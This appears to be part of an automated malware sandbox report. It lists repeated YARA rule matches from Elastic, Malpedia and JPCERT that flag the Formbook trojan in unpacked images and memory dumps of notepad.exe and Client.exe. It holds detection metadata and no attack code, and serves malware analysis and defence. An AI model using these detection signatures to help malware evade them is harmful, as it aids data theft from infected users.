          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Client.exe PID: 2948, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: notepad.exe PID: 2496, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
